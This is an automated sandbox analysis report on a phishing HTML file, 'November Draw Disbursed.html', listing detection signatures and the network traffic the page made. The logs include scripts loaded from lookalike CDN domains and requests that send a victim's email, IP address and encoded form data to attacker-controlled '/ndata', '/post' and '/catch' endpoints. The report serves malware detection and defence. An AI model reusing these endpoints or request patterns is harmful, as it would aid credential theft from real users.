
Windows Analysis Report
November Draw Disbursed.html

Overview

General Information

Sample Name: November Draw Disbursed.html
Analysis ID: 756202
MD5: c0d6d8acc86ed388214581788ec837d8
SHA1: c846ee109e9ee8e373ff09412a59e3aeec06fd44
SHA256: 2209177e77a2dabd0c034500ee64ccca71d8985c7c564ce31898ca2326bb6d78

Detection

HTMLPhisher
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected HtmlPhish10
Snort IDS alert for network traffic
JA3 SSL client fingerprint seen in connection with other malware
Invalid 'forgot password' link found
HTML body contains low number of good links
Invalid T&C link found
IP address seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
No HTML title found

Classification

  • System is w10x64
  • chrome.exe (PID: 5928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 1844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1856,i,16127261416295333797,16450193774645569565,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • chrome.exe (PID: 5328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\November Draw Disbursed.html" MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
Source              Rule                        Description                   Author        Strings
67505.0.pages.csv   JoeSecurity_HtmlPhish_10    Yara detected HtmlPhish_10    Joe Security
    No Sigma rule has matched
    Timestamp: 11/29/22-19:59:13.326192
    Source IP: 192.168.2.3
    Destination IP: 8.8.8.8
    SID: 2027758
    Source Port: 55638
    Destination Port: 53
    Protocol: UDP
    Classtype: Potentially Bad Traffic

    Timestamp: 11/29/22-19:59:15.999356
    Source IP: 192.168.2.3
    Destination IP: 8.8.8.8
    SID: 2027758
    Source Port: 53848
    Destination Port: 53
    Protocol: UDP
    Classtype: Potentially Bad Traffic


    Phishing

    Source: Yara match; File source: 67505.0.pages.csv, type: HTML
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html; HTTP Parser: Invalid link: Forgot my password
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html; HTTP Parser: Number of links: 1
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html; HTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html; HTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html; HTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html; HTTP Parser: HTML title missing
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html; HTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html; HTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe; Directory created: C:\Program Files\Google\GoogleUpdater
    Source: unknown; HTTPS traffic detected: 162.19.88.68:443 -> 192.168.2.3:49726 version: TLS 1.2
    Source: unknown; HTTPS traffic detected: 18.172.153.55:443 -> 192.168.2.3:49743 version: TLS 1.2

    Networking

    Source: Traffic; Snort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.3:55638 -> 8.8.8.8:53
    Source: Traffic; Snort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.3:53848 -> 8.8.8.8:53
    Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Joe Sandbox View; IP Address: 152.199.23.72 152.199.23.72
    Source: Joe Sandbox View; IP Address: 68.65.123.205 68.65.123.205
    Source: unknown; DNS traffic detected: queries for: clients2.google.com
    Source: unknown; Network traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknown; Network traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknown; Network traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49698
    Source: unknown; Network traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknown; Network traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49700 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknown; Network traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknown; Network traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknown; Network traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49706 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknown; Network traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknown; Network traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknown; Network traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49706
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49702
    Source: unknown; Network traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknown; Network traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49700
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknown; Network traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknown; Network traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknown; Network traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknown; Network traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknown; Network traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknown; Network traffic detected: HTTP traffic on port 49698 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknown; Network traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknown; Network traffic detected: HTTP traffic on port 49792 -> 443
    Source: global traffic; HTTP traffic detected:
        GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
        Host: clients2.google.com
        Connection: keep-alive
        X-Goog-Update-Interactivity: fg
        X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
        X-Goog-Update-Updater: chromecrx-104.0.5112.81
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: empty
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /wp/b1.js HTTP/1.1
        Host: descansonline.com
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
        sec-ch-ua-platform: "Windows"
        Accept: */*
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: script
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /jquery-3.5.2.min.js HTTP/1.1
        Host: maxcdn.bootstrapcdn.rest
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
        sec-ch-ua-platform: "Windows"
        Accept: */*
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: script
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /jquery-3.5.2.min.js HTTP/1.1
        Host: maxcdn.bootstrapcdn.cloud
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
        sec-ch-ua-platform: "Windows"
        Accept: */*
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: script
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /jquery-3.5.2.min.js HTTP/1.1
        Host: code.jquery.quest
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
        sec-ch-ua-platform: "Windows"
        Accept: */*
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: script
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /jquery-3.5.2.min.js HTTP/1.1
        Host: code.jquery.com.de
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
        sec-ch-ua-platform: "Windows"
        Accept: */*
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: script
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /jSY8DXQL/back.jpg HTTP/1.1
        Host: i.postimg.cc
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: image
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /jquery-3.5.2.min.js HTTP/1.1
        Host: maxcdn.bootstrapcdn.rest
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
        sec-ch-ua-platform: "Windows"
        Accept: */*
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: script
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
        If-Modified-Since: Sun, 10 Jul 2022 19:22:15 GMT
    Source: global traffic; HTTP traffic detected:
        GET /tkv/index.php?dt=QCPsVcn7rgD1hKIR25CTCLE0O HTTP/1.1
        Host: maxcdn.bootstrapcdn.cloud
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        Accept: */*
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Origin: null
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /ip.php HTTP/1.1
        Host: code.jquery.com.de
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        Accept: */*
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Origin: null
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /jSY8DXQL/back.jpg HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
        Host: i.postimg.cc
    Source: global traffic; HTTP traffic detected:
        GET /ndata/index.php?dt=wendy.lang@dmv.ca.gov HTTP/1.1
        Host: maxcdn.bootstrapcdn.cloud
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        Accept: application/json, text/javascript, */*; q=0.01
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Origin: null
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /dmv.ca.gov HTTP/1.1
        Host: logo.clearbit.com
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        Accept: */*
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Origin: null
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /dbd5a2dd-us0mikl89yxon-sgdcnggg1-x8-vglc85xxjmtn1cza/logintenantbranding/0/bannerlogo?ts=637227555210461681 HTTP/1.1
        Host: aadcdn.msauthimages.net
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: image
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /post/index.php?title=Sign%20in%20to%20your%20account&link=file:///C:/Users/user/Desktop/November%20Draw%20Disbursed.html&time=2022-11-29%2019:59:17&ip=102.129.143.49%20:%20Switzerland HTTP/1.1
        Host: maxcdn.bootstrapcdn.cloud
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        Accept: */*
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Origin: null
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global traffic; HTTP traffic detected:
        GET /dmv.ca.gov HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
        Host: logo.clearbit.com
    Source: global traffic; HTTP traffic detected:
        GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1
        Host: maxcdn.bootstrapcdn.cloud
        Connection: keep-alive
        sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
        Accept: */*
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Origin: null
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: cors
        Sec-Fetch-Dest: empty
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2009,1968,2050,1886,2009,2050,2337,1886,2009,2132,2091,1886,2132,2337,1312,2378,1312,3403,4879,4305,4756,5002,4141,4674,4428,3977,4510,4100,1312,2501,2501,2542,1312,1640,1312,3403,4305,4223,4510,1312,4305,4510,1312,4756,4551,1312,4961,4551,4797,4674,1312,3977,4059,4059,4551,4797,4510,4756,1312,1681,1312,2378,1804,4879,4141,4510,4100,4961,1886,4428,3977,4510,4223,2624,4100,4469,4838,1886,4059,3977,1886,4223,4551,4838,1804,3403,4305,4223,4510,1312,4305,4510,1804,4756,4674,4797,4141,1804,3403,4305,4223,4510,1312,2993,4510,410 HTTP/1.1Host: maxcdn.bootstrapcdn.cloudConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
